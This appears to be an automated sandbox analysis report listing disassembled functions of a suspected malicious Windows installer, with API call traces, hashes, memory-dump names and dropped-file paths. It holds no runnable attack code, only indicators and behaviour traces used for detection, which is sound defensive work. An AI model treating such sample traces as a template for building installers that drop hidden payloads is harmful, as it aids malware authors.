Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D

Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755

Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE

Non-executed Functions

Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C93
GetDlgItem.USER32(?,00000408), ref: 00404C9E
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
LoadBitmapW.USER32(0000006E), ref: 00404CFB
SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
DeleteObject.GDI32(00000000), ref: 00404D71
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
ShowWindow.USER32(?,00000005), ref: 00404ECB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
GlobalFree.KERNEL32(00000000), ref: 004050AB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
ShowWindow.USER32(?,00000000), ref: 0040524A
GetDlgItem.USER32(?,000003FE), ref: 00405255
ShowWindow.USER32(00000000), ref: 0040525C

Strings

N, xrefs: 00404F06
M, xrefs: 00404E25
, xrefs: 00405234

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58

Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040474E
SetWindowTextW.USER32(00000000,?), ref: 00404778
SHBrowseForFolderW.SHELL32(?), ref: 00404829
CoTaskMemFree.OLE32(00000000), ref: 00404834
lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
lstrcatW.KERNEL32(?,: Completed), ref: 00404872
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884

Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4

Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5

GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962

Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78

Strings

: Completed, xrefs: 00404860, 00404865, 00404870
A, xrefs: 00404822
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 0040484F

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 2624150263-3761743582
Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 542301482-2745823915
Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 004043CD Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
GetDlgItem.USER32(?,000003E8), ref: 0040447F
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
GetSysColor.USER32(?), ref: 004044AD
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
lstrlenW.KERNEL32(?), ref: 004044CE
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
GetDlgItem.USER32(?,0000040A), ref: 00404549
SendMessageW.USER32(00000000), ref: 00404550
GetDlgItem.USER32(?,000003E8), ref: 0040457B
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
SetCursor.USER32(00000000), ref: 004045CF
LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
SetCursor.USER32(00000000), ref: 004045EB
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C

Strings

N, xrefs: 00404569
: Completed, xrefs: 004045AA
DC@, xrefs: 004045D7

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$DC@$N
API String ID: 3103080414-907034273
Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
